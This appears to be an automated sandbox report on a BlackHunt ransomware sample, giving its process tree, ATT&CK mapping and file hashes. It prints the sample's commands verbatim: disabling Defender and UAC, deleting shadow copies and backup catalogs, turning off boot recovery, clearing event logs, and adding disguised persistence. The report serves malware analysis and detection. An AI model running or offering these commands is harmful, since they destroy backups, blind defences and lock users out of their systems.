description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe"C:\Users\Admin\AppData\Local\Temp\6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2688 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2828 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2784
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2808
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:688
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:3064
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:1724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2856
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:2308
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:344
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2708
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:488
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:540
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2880
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2248
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2592
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2568
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1916
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2080
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2476
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:1980
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe" /F2⤵PID:3044
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1580
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:1872
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1932
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1924
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:2168
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2932
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:2844
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1448
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:1208
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1596
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2056
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2684
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2604
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2720
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2652
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2696
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2636
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2988
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2816
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:3004
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:1028
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2256
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2156
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1204
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:3012
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:3404
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:2176
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe"2⤵
- Deletes itself
PID:2628
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:1732
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:2736
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:2076
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:2208
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:3296
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:3320
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:3344
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:3000
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:3648
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1144
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:3984
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:804
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:3312
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:3960
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:3388
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:3376
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:4080
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:2280
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:1760
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:2876
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f1⤵PID:2648
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f1⤵PID:2272
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f1⤵PID:1920
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\6b3ff43876428c662816018f7037e166f1abd29594e3df779711d0d6f92d88d5.exe" /F1⤵
- Creates scheduled task(s)
PID:1968
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet1⤵
- Deletes backup catalog
PID:2304
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2064
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:2260
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:3004
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2400
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k swprv1⤵PID:344
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:2668
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f1⤵PID:1620
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f1⤵PID:2396
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded1⤵
- Interacts with shadow copies
PID:2516
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f1⤵PID:1516
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1336
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No1⤵
- Modifies boot configuration data using bcdedit
PID:2776
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:1624
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:2112
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:1⤵
- Deletes NTFS Change Journal
PID:2928
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1680
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:1628
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable1⤵PID:1592
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB1⤵
- Interacts with shadow copies
PID:1920
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f1⤵PID:2480
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f1⤵PID:2416
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f1⤵PID:2556
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -Embedding1⤵PID:2112
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f1⤵PID:3020
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f1⤵PID:2296
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f1⤵PID:1256
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f1⤵PID:1352
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:1456
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f1⤵PID:1696
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f1⤵PID:1612
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f1⤵
- Modifies Windows Defender Real-time Protection settings
PID:2596
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f1⤵PID:1788
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:2608
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f1⤵
- Modifies registry class
PID:2912
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:2840
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f1⤵
- Modifies registry class
PID:2360
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1505430381-440235218-17288193831999611856-13987527420536160251915952902-797969357"1⤵PID:2272
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:1852
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3824
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"1⤵
- Modifies Internet Explorer settings
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1768
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 51⤵
- Runs ping.exe
PID:2168
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt1⤵PID:2576
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F1⤵PID:320
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f1⤵PID:412
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f1⤵PID:1944
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:892
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f1⤵PID:604
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:1⤵
- Deletes NTFS Change Journal
PID:2640
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable1⤵PID:2148
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:1724
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1280
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1332
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3140
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No1⤵
- Modifies boot configuration data using bcdedit
PID:3396
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1600
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\1⤵PID:3472
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\1⤵
- Enumerates connected drives
PID:2960
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\1⤵
- Enumerates connected drives
PID:3860
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-729247923-172529749616815341872025829620-14176892555542069471354769424451137265"1⤵PID:2696
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
6Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
12KB
MD5ec6df45424b438a31b611d65815ef3d7
SHA12ecd3ab5072431fd8b652a99a8f6ba71c4939727
SHA2564f4d04170b0eb3e79311508b860904904adea659de98b5f96d1eae7fed6ea66e
SHA51258d192b9a4af6d115287366f0e149dac5d8e8cb2fb28070603ee46ad7cdce490ac6b41265aa03116e0df23acacfe908aef77aa021d009c5138655207636ff9a1
-
Filesize
684B
MD56a6a362f907602964c294b91764ca364
SHA174e9594c914f6fc70c100574f5907f7ee50212be
SHA256ca74e2555e832a0e9c666d6a72d7e730aafc9a9914a111cbe0bdf6a0d11101ab
SHA51235f8435ad3ef67ab5d76f6733c44ba3362d0dbda27e48bf55a06b8546b552f015818ecaf56c42c11624082ce99e6df4880de67a76e80027098052e0dc5af03ec
-
Filesize
1KB
MD5df01dc148d450092dd8d02e9bd9ca88d
SHA12ad52899ae6768ea926ec4b6b847e06a87f6d6ea
SHA256f2eb37952f5db49dc2f9fca9cfff978e0d1d5a926d0296ffe70561a0c79d3886
SHA512d9840bd98fbf28fa00c5019ee7dabd9b9b1e7126bc06a3320b16499bcd13280ad5e573ab34d7b74cf6d2c8535c26e929e181ccb44f2ba96f268512efab4285ae